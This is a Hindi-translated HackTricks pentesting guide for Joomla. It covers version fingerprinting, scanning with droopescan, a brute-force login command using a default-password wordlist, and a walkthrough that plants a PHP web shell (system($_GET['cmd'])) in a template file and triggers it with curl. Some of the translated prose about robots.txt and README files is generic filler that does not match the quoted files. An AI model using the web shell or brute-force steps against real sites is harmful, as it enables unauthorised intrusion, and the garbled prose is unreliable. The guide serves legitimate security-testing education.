hacktricks/network-services-pentesting/pentesting-web/joomla.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

15 KiB

Joomla

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Joomla आंकड़े

Joomla कुछ गैर-पहचान उपयोग आंकड़े इकट्ठा करता है जैसे Joomla, PHP और डेटाबेस संस्करण और Joomla स्थापनाओं पर उपयोग में सर्वर ऑपरेटिंग सिस्टम का विवरण। इस डेटा को उनके सार्वजनिक API के माध्यम से क्वेरी किया जा सकता है।

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

जांच

खोज / फुटप्रिंटिंग

  • मेटा की जांच करें
curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />

robots.txt

यह एक टेक्स्ट फ़ाइल है जो वेबसाइट वेब क्रॉलर को बताता है कि कौन सी वेब पृष्ठों को क्रॉल करने और इंडेक्स करने की अनुमति है और कौन सी नहीं। यह फ़ाइल वेबसाइट के रूट निर्देशिका में स्थित होती है और वेब क्रॉलर उसे पहले ही खोज लेता है।

यदि आप वेबसाइट के robots.txt फ़ाइल को खोजना चाहते हैं, तो आपको वेबसाइट के रूट डायरेक्टरी में /robots.txt का उपयोग करना होगा। इस फ़ाइल में आपको वेबसाइट के लिए निर्देश दिए गए नियमों की सूची मिलेगी।

यदि आप वेबसाइट के robots.txt फ़ाइल को अद्यतन करना चाहते हैं, तो आपको एक पाठ संपादक का उपयोग करके इसे संपादित करना होगा। आप निर्देश देने के लिए विभिन्न नियमों का उपयोग कर सकते हैं, जैसे कि User-agent, Disallow, Allow, Sitemap आदि।

यदि आप वेबसाइट के robots.txt फ़ाइल को नष्ट करना चाहते हैं, तो आपको इसे रूट डायरेक्टरी से हटा देना होगा। इसका परिणामस्वरूप, कोई भी वेब क्रॉलर आपकी वेबसाइट को क्रॉल कर सकेगा और आपके वेब पृष्ठों को इंडेक्स कर सकेगा।

ध्यान दें कि robots.txt फ़ाइल केवल वेब क्रॉलरों के लिए एक निर्देश है और यह किसी भी सुरक्षा उल्लंघन को रोकने के लिए नहीं है। यदि आपकी वेबसाइट पर किसी तरह का सुरक्षा खतरा है, तो आपको अन्य सुरक्षा उपायों का उपयोग करना चाहिए।

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]

README.txt

यह फ़ाइल जूमला (Joomla) पेंटेस्टिंग के लिए एक गाइड है। यह गाइड वेब एप्लिकेशन के सुरक्षा जांच करने के लिए उपयोगी जानकारी प्रदान करेगा। यह गाइड वेब एप्लिकेशन के विभिन्न पहलुओं को परीक्षण करने के लिए उपयोगी टिप्स, ट्रिक्स और तकनीकों का वर्णन करेगा।

जूमला (Joomla) के बारे में

जूमला (Joomla) एक प्रसिद्ध ओपन स्रोत वेब डेवलपमेंट फ्रेमवर्क है जिसका उपयोग वेबसाइट और ऑनलाइन ऐप्लिकेशन बनाने के लिए किया जाता है। यह एक मजबूत और सुरक्षित प्लेटफ़ॉर्म है जिसमें विभिन्न सुरक्षा उपाय शामिल हैं, जैसे कि यूजर मैनेजमेंट, एक्सेस कंट्रोल, डेटाबेस सुरक्षा, और वेब एप्लिकेशन फ़ायरवॉल।

जूमला (Joomla) पेंटेस्टिंग के लिए उपयोगी टिप्स

यहां कुछ उपयोगी टिप्स हैं जो जूमला (Joomla) पेंटेस्टिंग के दौरान उपयोगी साबित हो सकते हैं:

  • वेबसाइट के वर्जन की जांच करें: जूमला (Joomla) के वर्जन की जांच करना महत्वपूर्ण है क्योंकि नवीनतम सुरक्षा अपडेट उपलब्ध हो सकते हैं जो आपकी पेंटेस्टिंग को सुरक्षित बना सकते हैं।

  • डिरेक्टरी और फ़ाइलों की जांच करें: जूमला (Joomla) वेबसाइट के डिरेक्टरी और फ़ाइलों की जांच करना आपको सुरक्षा खोजने में मदद कर सकता है। आप अनाम फ़ाइलों, अनुमतियों की जांच, और संदर्भित फ़ाइलों की जांच कर सकते हैं।

  • वेब एप्लिकेशन के विभिन्न पहलुओं की जांच करें: जूमला (Joomla) पेंटेस्टिंग के दौरान आप वेब एप्लिकेशन के विभिन्न पहलुओं की जांच कर सकते हैं, जैसे कि यूजर मैनेजमेंट, एक्सेस कंट्रोल, डेटाबेस सुरक्षा, और वेब एप्लिकेशन फ़ायरवॉल।

यहां दिए गए टिप्स के अलावा, आप जूमला (Joomla) पेंटेस्टिंग के लिए अन्य ट्रिक्स और तकनीकों का भी उपयोग कर सकते हैं। इस गाइड को ध्यान से पढ़ें और जूमला (Joomla) पेंटेस्टिंग में अपनी क्षमताओं को सुधारें।

1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

संस्करण

  • /administrator/manifests/files/joomla.xml में आप संस्करण देख सकते हैं।
  • /language/en-GB/en-GB.xml में आप Joomla का संस्करण प्राप्त कर सकते हैं।
  • plugins/system/cache/cache.xml में आप एक अनुमानित संस्करण देख सकते हैं।

स्वचालित

droopescan scan joomla --url http://joomla-site.local/

In 80,443 - पेंटेस्टिंग वेब मेथडोलॉजी एक धारा है जिसमें CMS स्कैनर हैं जो Joomla को स्कैन कर सकते हैं।

ब्रूट-फोर्स

आप इस स्क्रिप्ट का उपयोग करके लॉगिन को ब्रूट फोर्स करने का प्रयास कर सकते हैं।

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

यदि आपने व्यवस्थापक प्रमाणपत्र प्राप्त कर लिया है, तो आप इसके भीतर RCE प्राप्त कर सकते हैं एक PHP कोड के टुकड़े जोड़कर RCE प्राप्त करने के लिए। हम इसे एक टेम्पलेट को अनुकूलित करके कर सकते हैं।

  1. Configuration के नीचे बॉटम लेफ्ट पर Templates पर क्लिक करें ताकि टेम्पलेट मेनू खोलें।
  2. Template स्तंभ हेडर के तहत एक टेम्पलेट नाम पर क्लिक करें। चलो protostar को चुनते हैं। इससे हमें Templates: Customise पेज पर ले जाएगा।
  3. अंत में, आप पेज स्रोत खोलने के लिए पेज पर क्लिक कर सकते हैं। चलो error.php पेज को चुनते हैं। हम निम्नलिखित रूप में एक PHP वन-लाइनर जोड़कर कोड निष्पादन प्राप्त करेंगे:
  4. system($_GET['cmd']);
  5. Save & Close
  6. curl -s http://joomla-site.local/templates/protostar/error.php/error.php?cmd=id
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥